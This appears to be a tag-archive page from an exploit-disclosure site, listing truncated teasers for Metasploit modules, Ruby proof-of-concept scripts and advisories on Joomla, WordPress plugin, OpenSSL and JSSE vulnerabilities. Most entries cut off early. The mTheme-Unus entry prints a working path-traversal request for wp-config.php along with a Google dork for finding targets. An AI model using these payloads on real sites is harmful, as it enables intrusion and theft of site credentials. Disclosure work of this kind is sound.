Tags archives: unix

 

0

Joomla Content History SQL Injection Remote Code Execution

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper   def initialize(info={}) super(update_info(info, ‘Name’ => “Joomla Content History SQLi Remote Code Execution”, ‘Description’ => %q{ This module exploits a SQL injection vulnerability found in Joomla versions […]

 

0

WordPress Ajax Load More PHP Upload

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper   def initialize(info = {}) super(update_info(info, ‘Name’ => ‘Wordpress Ajax Load More PHP Upload Vulnerability’, ‘Description’ => %q{ This module exploits an arbitrary file upload in the […]

 

0

WP Fastest Cache 0.8.4.8 Blind SQL Injection

# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection # Date: 11-11-2015 # Software Link: https://wordpress.org/plugins/wp-fastest-cache/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps   1. Description   For this vulnerabilities also WP-Polls needs to be installed.   Everyone can access wpfc_wppolls_ajax_request().   $_POST[“poll_id”] is not escaped properly. […]

 

0

OpenSSL Alternative Chains Certificate Forgery

#!/usr/bin/env ruby # encoding: ASCII-8BIT # By Ramon de C Valle. This work is dedicated to the public domain.   require ‘openssl’ require ‘optparse’ require ‘socket’   Version = [0, 0, 1] Release = nil   class String def hexdump(stream=$stdout) 0.step(bytesize – 1, 16) do |i| stream.printf(‘%08x ‘, i)   0.upto(15) do |j| stream.printf(‘ ‘) […]

 

0

Java Secure Socket Extension (JSSE) SKIP-TLS

#!/usr/bin/env ruby # encoding: ASCII-8BIT # By Ramon de C Valle. This work is dedicated to the public domain.   require ‘openssl’ require ‘optparse’ require ‘socket’   Version = [0, 0, 1] Release = nil   def prf(secret, label, seed) if secret.empty? s1 = s2 = ” else length = ((secret.length * 1.0) / 2).ceil […]

 

0

WordPress Neuvoo-Jobroll 2.0 Cross Site Scripting

###################################################################### # Exploit Title: Wordpress plugin neuvoo-jobroll 2.0 Reflected Cross-Site Scripting (RXSS) # Date: 05/11/2015 # Author: Mickael Dorigny @ Synetis # Vendor or Software Link: http://neuvoo.fr/fr # Version: 2.0 # Category: Reflected Cross Site Scripting # Google dork: # Tested on : Wordpress with neuvoo-jobroll 2.0 ######################################################################   Neuvoo description : ======================================================================   Neuvoo […]

 

0

WordPress Font 7.5 Path Traversal

Details ================ Software: Font Version: 7.5 Homepage: https://wordpress.org/plugins/font/ CVE: CVE-2015-7683 (Pending) CVSS: 6.3 (Medium; AV:N/AC:M/Au:S/C:C/I:N/A:N) CWE: CWE-22   Description ================ An absolute path traversal vulnerability in Font 7.5 allows WordPress admins read access to system files such as /etc/passwd. Font is a WordPress plugin with over 40,000 active installs.   Vulnerability ================ The vulnerability is […]

 

0

WordPress Pie Register 2.0.18 SQL Injection

Details ================ Software: Pie Register Version: 2.0.18 Homepage: https://github.com/GTSolutions/Pie-Register CVE: CVE-2015-7682 (Pending) CVSS: 3.5 (Low; AV:N/AC:M/Au:S/C:P/I:N/A:N) CWE: CWE-89   Description ================ Two blind SQL injection vulnerabilities in Pie Register 2.0.18 allow SQL injection by admins leading to loss of database confidentiality. Pie Register is a WordPress plugin with over 10,000 active installs.   Vulnerabilities ================ […]

 

0

WordPress Events Made Easy 1.5.49 CSRF / XSS

Plugin link: https://wordpress.org/plugins/events-made-easy/ Active Installs: 10,000+ Version tested: 1.5.49 CVE Reference: Waiting Original advisory: https://www.davidsopas.com/events-made-easy-wordpress-plugin-csrf-persistent-xss/   Events Made Easy is a full-featured event management solution for WordPress. Events Made Easy supports public, private, draft and recurring events, locations management, RSVP (+ optional approval), Paypal, 2Checkout, FirstData and Google maps. With Events Made Easy you can […]

 

0

WordPress mTheme-Unus Local File Inclusion

####################################### # Exploit Title: Wordpress themes mTheme-Unus LFI Vulnerability # # Date: 2015-09-27 # Exploit Author: FullSecurity.org # Google Dork: ilnurl:/wp-content/themes/mTheme-Unus/ # Vendor Homepage: https://wordpress.org/ # Tested on : Kali Linux ######################################## Description : Wordpress Themes mTheme-Unus not filtering data so we can get the configration file in the path < site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php>   # Exploite […]